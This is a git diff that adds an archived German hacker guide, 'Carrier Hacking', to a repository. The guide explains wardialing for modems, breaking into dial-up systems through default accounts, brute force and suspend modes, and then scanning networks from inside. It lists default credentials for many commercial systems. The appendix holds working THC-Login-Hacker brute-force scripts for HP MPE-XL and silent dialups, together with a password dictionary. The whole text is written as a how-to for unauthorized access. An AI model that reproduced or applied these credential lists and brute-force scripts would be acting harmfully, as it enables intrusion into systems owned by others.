X-Git-Url: https://git.librecmc.org/?p=oweals%2Fthc-archive.git;a=blobdiff_plain;f=Papers%2Fcarriers.txt;fp=Papers%2Fcarriers.txt;h=8226f7ca69371fe94cbe7b8f1ca87c1ed20cf3da;hp=0000000000000000000000000000000000000000;hb=dfbf6f563fd603e051f44a00e375b592a002b736;hpb=1bf41562f218d9a607f88640fb33bf0775424756 diff --git a/Papers/carriers.txt b/Papers/carriers.txt new file mode 100644 index 0000000..8226f7c --- /dev/null +++ b/Papers/carriers.txt @@ -0,0 +1,884 @@ + + + + + CARRIER HACKING + + by Giemor + + + + + + +Warum Carrier Scanning/Hacking +------------------------------ + +In der heutigen Zeit ist der Zugang zum Internet im Vergleich zu den USA +sehr teuer, also kann man sich andere Wege suchen die eigenen Wege zu senken. +Zum Beispiel mit einer 0130 gebuehrenfreien Nummer der Telekom. +Es reicht ja schon wenn man ein Tymnet, Datex-P oder Sprintnet Dial-up findet +und sich von dort aus zu einen Provider weiterverbinden laesst wie Compuserve, +IBM-NET oder Aol. Mit etwas Glueck findet man einen Outdial womit man sich +dann weiter verbinden lassen kann. Oder man findet zugang zu Telnet, TN3270, +FTP, PPP, SLIP, Telenet, Datapac, Telepac, Decnet, X25, etc... +Aber auch zum Zeitvertreib kann man sich z.B. einige oeffentliche BBS (oder +nicht-oeffentliche in die man sich social-engineered) einloggen und mit +Kumpels leicht Software austauschen oder man versucht herauszufinden, was +sich z.B hinter den Grossrechnern des typs HP3000 oder HP MPE-XL verbirgt. + + + +Wie findet man Carriers +----------------------- + +Der beste und schnellste Weg ist sie mit einem Wardialer zu scannen. +(thc-scan, toneloc, a-dial). Man kann mit diesen Programmen einen bestimmten +Bereich von Telefonnummern durchscannen lassen, wo man viel interessantes +finden kann, uns aber speziell hier die gefundenen Modems interessieren. +Der Scanner hat zudem den Vorteil, dass er die heufigsten emulationen, parity, +data length, stop bits, ausprobiert sowie breaks sendet, , <.> etc. und +schliesslich gefundene Rufnummer mit dem Text, den das gefundene Modem +ausgibt in einer Logdatei speichert. +Es ist von grossem Vorteil wenn das Scan-Modem die VOICE Antwort unterstuetzt, +da man so mit bis zu 900% die Geschwindigkeit des Abscannens steigern kann. + + + +Was sind Silent Carriers +------------------------ + +Sehr oft bekommt man einen Connect aber nichts passiert - aber irgendein System +muss ja dahinter sein. Entweder man benutzt eine falsche Terminal Emulation, +oder die Baudrate ist zu hoch, oder parity, data length, stop bits sind falsch +eingestellt. +a) aendert parity, data length, stop bits, auf 7S1, 7S2, 8E2, 8E1. + die meisten Systeme benutzten 8N1, 7E1 und 7O1. +b) aendert die Terminal emulation: + + IBM 3101 TV 910 BEEHIVE ATL078 + IBM PC/FTTERM COLOR LS ADM3A UDT01 + IBM PC/FTTERM MONO ADDS VP UDT02 + IBM 3161/62/63 HAZEL 1500 UDT03 + IBM 3151 HAZEL ESP I UDT04 + IBM 3164 HAZEL ESP II UDT05 + VT52 NT DISPLAY ANSI + VT100 TT 5410 ANSI-BBS + VT220 TT 5420 + FALCO 500 HP 2621B Qmodem Pro unterstuetzt + WYSE 50 DG D210 diese Emulationen + +c) aendert die baudrate auf 300, 600, 1200 probiert alles was euer Terminal + Programm unterstuetzt. +d) drueckt oefters hinter einander, , esc, .' sendet mehrere breaks, +e) Manchmal kommt es auch einfach vor das Modems nicht miteinander auskommen, + und dann keinen output anzeigen. Zum optimalen Scannen eignet sich am + besten ein Zyxel und ein USR Courier, aeltere Modelle reichen. +f) im Anhang ist ein Login Hacker Script fuer Silent Carriers bei denen a bis e + versagt ;-) + + + +Ich habe ein System gefunden +---------------------------- + +Jetzt muss man erst einmal wissen was fuer ein System man gefunden hat. +Dazu eine Liste mit System Namen und standart Accounts im zweiten Teil. +Dann kann man z.B. alle standart Accounts durchprobieren. +Wenn man den Betreiber des Systemes kennt, z.B eine Firma, dann sollte +man deren Produkte oder Mitarbeiter Namen als login und Password +versuchen. Wenn das alles nichts hilft bleibt nur noch Brute Force +Hacking uebrig. Man probiert mit einem programm alle moeglichen +Kompinationen, Buchstaben und Zahlen an dem System aus. Am besten man +macht das an einem System wo man endlos eingabe versuche hat. Ein gutes +Programm dafuer ist der Thc-Login Hacker, man kann ihn an jedes beliebige +System anpassen weil er mit Script Technik arbeitet. Ein Beispielscript +gibts dazu im Anhang. + + + +Suspend/Command Modus +--------------------- + +Manche Firmen haben ihre dialups echt gut gesichert. Unknackbare Passwoerter +etc. etc. - nur haben sie vielleicht etwas uebersehen : +Viele Programme haben einen "Command Mode", wo man obwohl das Programm laeuft +noch Einstellungen veraendern kann. Ein typisches Beispiel ist z.B. beim +Modem das "+++" wo man dann Modem Kommandos eingeben kann, und dann mit "AT O" +die Verbindung weiter benutzen kann. Andere Programme lassen sich in den +Hintergrund suspenden und man kann eine shell bekommen (z.B. bei unix) +Wie findet man solche Command/Suspend Modes? Sendet ein -BREAK-, ^Z, ^], ^+ +sowie alle weiteren Control-Codes von ^A ueber ^Z bis ^] (01 bis 29). +Was kann man in solchen Modi machen? Nun das haengt vom Programm ab das so +einen Command modus bietet oder das System was einen das Programm suspenden +laesst. Bei Unix z.B. hat man eine shell, mit Glueck sogar eine root shell, +also jackpot. Bei dem Dienstprogramm telnet auf unix, oder auch manche +Dec-Server und Ascend Dialups kommt man in einen command modus wo man z.B. +einen telnet, ping oder sogar ppp machen kann - kann also so das Netzwerk +abscannen oder sogar hacken. + + + +Sonderfall: Internet +-------------------- + +Besonders interessant sind Rechner die am Internet angeschlossen sind. +Bei manchen Connects sieht man z.B. eine IP Adresse, bei anderen den vollen +hostname + domain. Damit kann man z.B. problemlos herausfinden in welchem +Netz die sind (traceroute, broadcast pings, etc.) und versuchen vom Internet +in den Host oder das Netzwerk hineinzukommen. +Falls man nur den hostname sieht kann man sich von ftp.nw.com (Netwizards) +die gesamten ping-baren hosts aller domains holen, z.B. der .com domain und +darin leicht mit einem grep schauen zu welchem Netzwerk der Rechner gehoert. +Falls er nicht in den Listen ist oder aber bei hostname+domain mit ping oder +traceroute nicht zu erreichen ist, ist er entweder nicht angeschlossen, oder +aber hinter einer Firewall, also wenn man nicht wirklich gut im hacking ist +die Finger davon lassen. + +-------------------------------capture---------------------------------------- +CONNECT 14400/ARQ/MNP5 +Trying ... +Connected to 192.354.24.5 +Escape character is '^]'. + +UNIX(r) System V Release 4.0 (sisy500) + +Login: +-------------------------------capture---------------------------------------- + + + +Systeme mit standart Accounts +----------------------------- + +------------------------------------------------------------------------------ +DECserver Communications Server + +DECserver 90TL Communications Server V1.1 (BL44-10) - LAT V5.1 + +Local -010- Session 1 to ZYNET1 established + +Login: +PASSWORD: + +Local -011- Session 1 disconnected from ZYNET1 +hello> + +Standart Accounts: +------------------ +ACCESS +SYSTEM + +Eine Beschreibung von Dec-Servern in Hinsicht auf Outdials siehe THC-MAG2 +------------------------------------------------------------------------------ +Xyplex Terminal Server. + +Enter username> +Local> + +Standart Accounts: +------------------ +ACCESS +SYSTEM +------------------------------------------------------------------------------ + +Annex Command Line Interpreter * Copyright 1991 Xylogics, Inc + +Checking authorization, Please wait... +Annex username: (Enter your NCI userid) +Annex password: (Enter your NCI password) +Permission granted +Annex: + +Befehl Parameter Beschreibung +--------------------------------------------------- +? ? [] :Hilfe +bg bg [-dq] [%][%,+,-,,] :Eine Aktion in Hintergrund setzen +fg fg [-q] [%][%,+,-,,] :zurueck zu einer aktuellen Aktion +hangup hangup [-q] :Auflegen und Port reseten +help help [] :Hilfe +jobs jobs :Zeigt aktuelle Aktionen an +kill kill [%][%,+,-,,]... :Kille eine Aktion +stty stty [parameter [value]]... :Show/Set Annex Port Parameter +telnet telnet [-rsst] [ [port]] :Starte Telnet Connection +who who [[-l] []@ ...] :Zeigt System User + +Standart accounts: +------------------ +guest guest +------------------------------------------------------------------------------ + +ROLM PhoneMail 9252 9254 Microcode Version 5.2 +Login: ? +Valid login modes are: +SYSADMIN, +TECH, +POLL. +Login:tech +Password:tech +ROLM PhoneMail 9252 9254 Microcode Version 5.2 +Copyright (C) ROLM Systems 1991 +All Rights Reserved. +Aktion: + + ( Mit den Befehl "?" oder help kommt man zum folgenden menue) + + The following commands are valid: + Activate - Activate the session + Broadcast - Broadcast a message to all terminals + Connect - Invoke the subsystem + Terminate - Terminate the session + List - List all open sessions + Logout - Terminate all sessions and log off. + Login - Logout and login again. + Display - Display sessions status on a site. + TechView - Enable/Disable TechView training. +------------------------------------------------------------------ +Beschreibung aus TFC05: + +ActivatePM : Starts the Phone Mail system. +AssignClasses : External program to assign COS to each user in the + database. Only local non-Call Processing users are + assigned classes. +BackupDataBase : Create a backup of the customer database on HD or + floppies. +BackupNames : Copies name header information for all subscribers to + a floppy/floppies. +CallProcessing : An external program to create and maintain Mailbox + Profiles. +ChannelTrace : Lists the current state of each channel. Continously + updates until interrupted. +DeactivatePM : Turn off PM system. DON'T USE THIS UNLESS YOU ARE + VERY SURE OF WHAT YOU ARE DOING! Calls will no + longer be taken by the PM if it is deactivated. +DList : Show distribution lists. +FFormat : Format a floppy disk. The single most useless command + for a remote user. +LogOff : Quit session and go to session manager menu. +MonitorLogon : Monitor users logging in to PM. +MonitorTapLink : Shows tap traffic on CBX integrated systems. Continues + to update until interrupted. +OCConfigAndTest : Utility to configure and test all outcalling + related parameters. +Profile : Add All Clear Delete Fix List Modify Purge +Reports : Display reports. +CallActivity : Displays call activity by the hour, with averages. + +Standart accounts +----------------- +sysadmin sysadmin +operator operator +poll poll oder tech +tech tech oder operator + +Info: +Eine genaue Beschreibung ueber dieses System giebt es in TFC #5 +------------------------------------------------------------------------------ + +ROLM CBX II + +ROLM CBXII RELEASE 9004.2.34 RB295 9000D IBMHO27568 +BIND DATE: 7/APR/93 +COPYRIGHT 1980, 1993 ROLM COMPANY. ALL RIGHTS RESERVED. +ROLM IS A REGISTERED TRADEMARK AND CBX IS A TRADEMARK OF ROLM COMPANY. +YOU HAVE ENTERED CPU 1 +12:38:47 ON WEDNESDAY 2/15/1995 + +USERNAME: op + +PASSWORD: + + INVALID USERNAME-PASSWORD PAIR + +Standart Accounts: +------------------ +op op +op operator +su super +admin pwp +eng engineer +------------------------------------------------------------------------------ + +ARC NetBlazer Version 2.1 +ARC-login: + +Standart Accounts: +------------------ +test +setup +remote +snmp +MAV +------------------------------------------------------------------------------ + +Telebit's NetBlazer Version 2.0x5 +netblzr2 login: + +Standart Accounts: +------------------ +test +setup +remote +snmp +MAV +------------------------------------------------------------------------------ + +IFG's VAX 8650 + +%SECURE-I-NET, Incoming number logged by Secure-net + +Username: +Password: +Welcome to VAX 8650 +$ + +Standart Accounts: +------------------ +Vax +Vms +Dcl +Demo +Test +Help +News +Guest +Decnet +Systest +Uetp +Default +User +Field +Service +System +Manager +Operator +------------------------------------------------------------------------------ +HP 3000 + +MPE XL: +MPE XL:HELLO +Expected [session name,] user.acct [,group]. (CIERR 1424) +MPE XL:hello mgr.sys +ENTER ACCOUNT (SYS) PASSWORD: +ENTER ACCOUNT (SYS) PASSWORD: +ENTER ACCOUNT (SYS) PASSWORD: + +Standart Accounts: +------------------ +HELLO MANAGER.SYS +HELLO MGR.SYS +HELLO FIELD.SUPPORT HPUNSUP or SUPPORT or HP +HELLO OP.OPERATOR +MGR CAROLIAN +MGR CCC +MGR CNAS +MGR CONV +MGR COGNOS +OPERATOR COGNOS +MANAGER COGNOS +OPERATOR DISC +MGR HPDESK +MGR HPWORD +FIELD HPWORD +MGR HPOFFICE +SPOOLMAN HPOFFICE +ADVMAIL HPOFFICE +MAIL HPOFFICE +WP HPOFFICE +MANAGER HPOFFICE +MGR HPONLY +FIELD HPP187 +MGR HPP187 +MGR HPP189 +MGR HPP196 +MGR INTX3 +MGR ITF3000 +MANAGER ITF3000 +MAIL MAIL +MGR NETBASE +MGR REGO +MGR RJE +MGR ROBELLE +MANAGER SECURITY +MGR SECURITY +FIELD SERVICE +MANAGER SYS +MGR SYS +PCUSER SYS +RSBCMON SYS +OPERATOR SYS +OPERATOR SYSTEM +FIELD SUPPORT +OPERATOR SUPPORT +MANAGER TCH +MAIL TELESUP +MANAGER TELESUP +MGR TELESUP +SYS TELESUP +MGE VESOFT +MGE VESOFT +MGR WORD +MGR XLSERVER + +Ein Login Hacker Script gibt es im Anhang +------------------------------------------------------------------------------ + +System75 + +Login: root +INCORRECT LOGIN + +Login: browse +Password: + +Software Version: G3s.b16.2.2 + +Terminal Type (513, 4410, 4425): [513] + +Standart Accounts: +------------------ +bcim bcimpw +bciim bciimpw +bcms bcmspw, bcms +bcnas bcnspw +blue bluepw +browse looker, browsepw +craft crftpw, craftpw, crack +cust custpw +enquiry enquirypw +field support +inads indspw, inadspw, inads +init initpw +kraft kraftpw +locate locatepw +maint maintpw, rwmaint +nms nmspw +rcust rcustpw +support supportpw +tech field +------------------------------------------------------------------------------ +AIX + +IBM AIX Version 3 for RISC System/6000 +(C) Copyrights by IBM and by others 1982, 1990. +login: + +Standart Accounts: +------------------ +guest guest +------------------------------------------------------------------------------ + +AS/400 + +UserID? +Password? + +Standart Accounts: +------------------ +qsecofr qsecofr +qsysopr qsysopr +qpgmr qpgmr +ibm password +ibm 2222 +ibm service +qsecofr 1111111 +qsecofr 2222222 +qserv qserv +qsvr qsvr +secofr secofr +qsrv ibmce1 +------------------------------------------------------------------------------ + + +Systeme ohne Standart Accounts +------------------------------ + +CDC Cyber + +WELCOME TO THE NOS SOFTWARE SYSTEM. +COPYRIGHT CONTROL DATA 1978, 1987. + +88/02/16. 02.36.53. N265100 +CSUS CYBER 170-730. NOS 2.5.2-678/3. +FAMILY: + +You would normally just hit return at the family prompt. Next prompt is: + +USER NAME: +------------------------------------------------------------------------------ + +Cisco Router + +cisco_router_1> (kann jeder beliebige Promt sein) +cisco_router_1>LOGIN +Username: +Password: +------------------------------------------------------------------------------ + +GTN + +WELCOME TO CITIBANK. PLEASE SIGN ON. +XXXXXXXX + +@ +PASSWORD = + +@ + +=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= + +PLEASE ENTER YOUR ID:-1-> +PLEASE ENTER YOUR PASSWORD:-2-> + +CITICORP (CITY NAME). KEY GHELP FOR HELP. + XXX.XXX + PLEASE SELECT SERVICE REQUIRED.-3-> +------------------------------------------------------------------------------ + +Lantronix Terminal Server + +Lantronix ETS16 Version V3.1/1(940623) + +Type HELP at the 'Local_15> ' prompt for assistance. + +Login password> +------------------------------------------------------------------------------ + +NIH Timesharing + +NIH Tri-SMP 7.02-FF 16:30:04 TTY11 +system 1378/1381/1453 Connected to Node Happy(40) Line # 12 +Please LOGIN +. +------------------------------------------------------------------------------ + +VM/ESA ONLINE + + TBVM2 VM/ESA Rel 1.1 PUT 9200 + +Fill in your USERID and PASSWORD and press ENTER +(Your password will not appear when you type it) +USERID ===> +PASSWORD ===> + +COMMAND ===> +------------------------------------------------------------------------------ + + + +ANHANG: + +Login Hacker Scripts: +--------------------- + +[BEGIN hp_mpe.txt] +; +; +; ------------------------------------------------------------------------ +; HP MPE-XL : SAC-Script for THC-Login-Hacker v1.0 (by van Hauser) +; ------------------------------------------------------------------------ +; +; +; MPE XL: +; EXPECTED A :HELLO COMMAND. (CIERR 6057) +; MPE XL: hello +; EXPECTED [SESSION NAME,] USER.ACCT [,GROUP] (CIERR 1424) +; +; +============================================================================= +#DEFINE +PHONE_NR=* +LOGFILE=*.log +DIAL_TRIES=100 +LOGIN_TRIES=0 +DIC(1)=hp_mpe_a.dic +; uncomment command lines below to check for 6 more common MPE passwords + +#NOCARRIER +LOG(CARRIER LOST on $DATE at $TIME) + +LOG() +GOTO(1) + +#START +LOG(--------------------------------------------------------------------------) +LOG( TARGET : $PHONE_NR ) +LOG( DATE : $DATE ) +LOG( TIME : $TIME ) +LOG() +LOG_SESSION_ON +SET D_TMP=1 +SET S_TMP=X + +:1 +SET STRING=X +DIAL +WAIT(1) +IF STRING~XL THEN GOTO(2) +WAIT4STRING(2,^M,6,GOTO(1),XL) + +:2 +SET STRING=X + +SEND_(HELLO ) +IF D_TMP=1 THEN SEND_(ADVMAIL.) +IF D_TMP=2 THEN SEND_(FIELD.) +IF D_TMP=3 THEN SEND_(MAIL.) +IF D_TMP=4 THEN SEND_(MANAGER.) +IF D_TMP=5 THEN SEND_(MGE.) +IF D_TMP=6 THEN SEND_(MGR.) +IF D_TMP=7 THEN SEND_(OP.) +IF D_TMP=8 THEN SEND_(OPERATOR.) +IF D_TMP=9 THEN SEND_(PCUSER.) +IF D_TMP=10 THEN SEND_(RSBCMON.) +IF D_TMP=11 THEN SEND_(SPOOLMAN.) +IF D_TMP=12 THEN SEND_(SYS.) +IF D_TMP=13 THEN SEND_(WP.) + +IF S_TMP=X THEN SEND_NEXT_DIC(1) +IF S_TMP=Y THEN SEND_DIC(1) +IF S_TMP=Z THEN SEND_DIC(1) +IF S_TMP=A THEN SEND_DIC(1) +; IF S_TMP=B THEN SEND_DIC(1) +; IF S_TMP=C THEN SEND_DIC(1) + +IF D_TMP=13 THEN SET S_TMP=X +IF D_TMP=13 THEN SET D_TMP=1 +WAIT(1) +; set this higher if the system response is slow +IF STRING2~HELLO THEN GOTO(3) +IF STRING2~exists THEN GOTO(3) +IF STRING2~on-ex THEN GOTO(4) +IF STRING2~ASSW THEN GOTO(5) +WAIT(2) +IF STRING2~HELLO THEN GOTO(3) +IF STRING2~exists THEN GOTO(3) +IF STRING2~on-ex THEN GOTO(4) +IF STRING2~ASSW THEN GOTO(5) +GOTO(1) + +:3 +INC(D_TMP) +GOTO(2) + +:4 +SET S_TMP=X +SET D_TMP=1 + +:5 +IF S_TMP=Z THEN GOTO(6) +IF S_TMP=A THEN GOTO(7) +;IF S_TMP=B THEN GOTO(8) +;IF S_TMP=C THEN GOTO(9) +SET S_TMP=Z +LOG_($DIC(1)) +SEND_DIC(1) +WAIT(1) +LOG_(HPOnly) +SEND(HPOnly) +WAIT(1) +LOG_(HP) +SEND(HP) +WAIT(2) +GOTO(1) + +:6 +SET S_TMP=A +LOG_(MPE) +SEND(MPE) + +LOG_(Manager) +SEND(Manager) +WAIT(1) +LOG_(mgr) +SEND(mgr) +WAIT(2) +GOTO(1) + +:7 +SET S_TMP=X +; SET S_TMP=B +LOG_(remote) +SEND(remote) +WAIT(1) +LOG_(TeleSup) +SEND(TeleSup) +WAIT(1) +LOG_(operator) +SEND(operator) +WAIT(2) +GOTO(1) + + +; SET S_TMP=C +; LOG_(tech) +; SEND(tech) +; WAIT(1) +; LOG_(mail) +; SEND(mail) +; WAIT(1) +; LOG_(hpoffice) +; SEND(hpoffice) +; WAIT(2) +; GOTO(1) + +; :9 +; SET S_TMP=X +; LOG_(sys) +; SEND(sys) +; WAIT(1) +; LOG_(security) +; SEND(security) +; WAIT(1) +; LOG_(support) +; SEND(support) +; LOG_(hpoffice) +; SEND(hpoffice) +; WAIT(2) +; GOTO(1) + +; :9 +; SET S_TMP=X +; LOG_(sys) +; SEND(sys) +; WAIT(1) +; LOG_(security) +; SEND(security) +; WAIT(1) +; LOG_(support) +; SEND(support) + +; GOTO(1) + +:100 +LOG() +LOG( END OF : $PHONE_NR ) +LOG(--------------------------------------------------------------------------) +#END +[END] + + + +[BEGIN hp_mpe_a.dic] +CAROLIAN +CCC +CNAS +COGNOS +CONV +DISC +HP +HPDESK +HPOFFICE +HPONLY +HPP187 +HPP189 +HPP196 +HPUNSUP +HPWORD +INTX3 +ITF3000 +MAIL +NETBASE +OPERATOR +REGO +RJE +ROBELLE +HPP187 +HPP189 +HPP196 +HPUNSUP +HPWORD +INTX3 +ITF3000 +MAIL +NETBASE +OPERATOR +REGO +RJE +ROBELLE +SERVICE +SUPPORT +SYS +SYSTEM +TCH +TELESUP +VESOFT +WORD +XLSERVER +[END] + + +[BEGIN silent.txt] +; +; +; ------------------------------------------------------------------------ +; Silent Dialups : SAC-Script for THC-Login-Hacker v1.0 (by van Hauser) +; ------------------------------------------------------------------------ +; +; Silent Dialups : No output/response from dialup modem +; (both types, 30 sec hangup & unlimited) +; +; (takes approx. 9-10 hours) +; +; +============================================================================= +#DEFINE +PHONE_NR=#### +LOGFILE=#### +DIAL_TRIES=50 +LOGIN_TRIES=0 +BRUTE(1)=^$,1,1,3 +; tries every combination of Controll-Chars and Misc. Chars from 1 to 3 length. + +#NOCARRIER +CHECK4OUTPUT(OFF) +LOG(CARRIER LOST on $DATE at $TIME) + +LOG() +LOG() +GOTO(1) + +#START +LOG(--------------------------------------------------------------------------) +LOG( TARGET : $PHONE_NR ) +LOG( DATE : $DATE ) +LOG( TIME : $TIME ) +LOG() +LOG_SESSION_ON + +:1 +DIAL +WAIT(1) +CHECK4OUTPUT(99) + +:2 +SEND_NEXT_BRUTE(1) +WAIT_(255) +;waits 255ms between every attempt +GOTO(2) +CHECK4OUTPUT(99) + +:2 +SEND_NEXT_BRUTE(1) +WAIT_(255) +;waits 255ms between every attempt +GOTO(2) + +:99 +CHECK4CARRIER(OFF) +WAIT(5) +CHECK4CARRIER(#NOCARRIER) + +:100 +HANGUP +BEEP +BEEP +BEEP +LOG() +LOG() +LOG( FOUND : $BRUTE(1)) +LOG(--------------------------------------------------------------------------) +#END +[END] + + \ No newline at end of file